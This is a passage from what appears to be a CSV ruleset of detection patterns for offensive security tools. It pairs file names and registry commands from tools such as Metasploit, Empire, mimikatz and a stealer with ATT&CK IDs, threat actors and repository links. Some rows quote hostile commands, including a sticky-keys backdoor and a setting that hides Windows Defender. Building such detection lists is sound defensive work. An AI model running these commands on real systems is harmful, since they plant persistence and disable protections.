"*ReflectiveDLLInjection*",".{0,1000}ReflectiveDLLInjection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56611"
"*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56612"
"*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","56613"
"*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56614"
"*ReflectiveDllInjection.*",".{0,1000}ReflectiveDllInjection\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56615"
"*ReflectiveDLLInjection.h*",".{0,1000}ReflectiveDLLInjection\.h.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","56616"
"*ReflectiveDLLInjection/dll*",".{0,1000}ReflectiveDLLInjection\/dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","56617"
"*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","56618"
"*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","56619"
"*ReflectiveLoader.*",".{0,1000}ReflectiveLoader\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56620"
"*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56621"
"*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56622"
"*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","56623"
"*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56624"
"*ReflectiveLoader.h*",".{0,1000}ReflectiveLoader\.h.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56625"
"*ReflectiveNTDLL.cpp*",".{0,1000}ReflectiveNTDLL\.cpp.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56626"
"*ReflectiveNTDLL.exe*",".{0,1000}ReflectiveNTDLL\.exe.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56627"
"*ReflectiveNTDLL.sln*",".{0,1000}ReflectiveNTDLL\.sln.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56628"
"*ReflectiveNTDLL.vcxproj*",".{0,1000}ReflectiveNTDLL\.vcxproj.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56629"
"*ReflectiveNtdll-main*",".{0,1000}ReflectiveNtdll\-main.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","56630"
"*ReflectivePick_x64_orig.dll*",".{0,1000}ReflectivePick_x64_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56631"
"*ReflectivePick_x86_orig.dll*",".{0,1000}ReflectivePick_x86_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56632"
"*RefleXXion*ntdll.dll*",".{0,1000}RefleXXion.{0,1000}ntdll\.dll.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56633"
"*RefleXXion.sln*",".{0,1000}RefleXXion\.sln.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56634"
"*RefleXXion-DLL*",".{0,1000}RefleXXion\-DLL.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56635"
"*RefleXXion-EXE*",".{0,1000}RefleXXion\-EXE.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56636"
"*RefleXXion-main*",".{0,1000}RefleXXion\-main.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56637"
"*reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\"" /v *.dll*",".{0,1000}reg\sadd\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpClient\\\""\s\/v\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#registry","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","56653"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""C\:\\windows\\system32\\cmd\.exe\"".{0,1000}","offensive_tool_keyword","Windows-Crack","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/japd06/Windows-Crack/","1","0","#registry","N/A","9","1","24","10","2019-04-17T21:54:13Z","2019-06-19T04:00:51Z","56659"
"*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""SettingsPageVisibility"" /t REG_SZ /d ""hide:recovery;windowsdefender"" /f >nul*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\""\s\/v\s\""SettingsPageVisibility\""\s\/t\sREG_SZ\s\/d\s\""hide\:recovery\;windowsdefender\""\s\/f\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56662"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintOnly\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56684"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintServerList\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56686"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers"" /f /v 1 /t REG_SZ /d *",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\\ListofServers\""\s\/f\s\/v\s1\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - 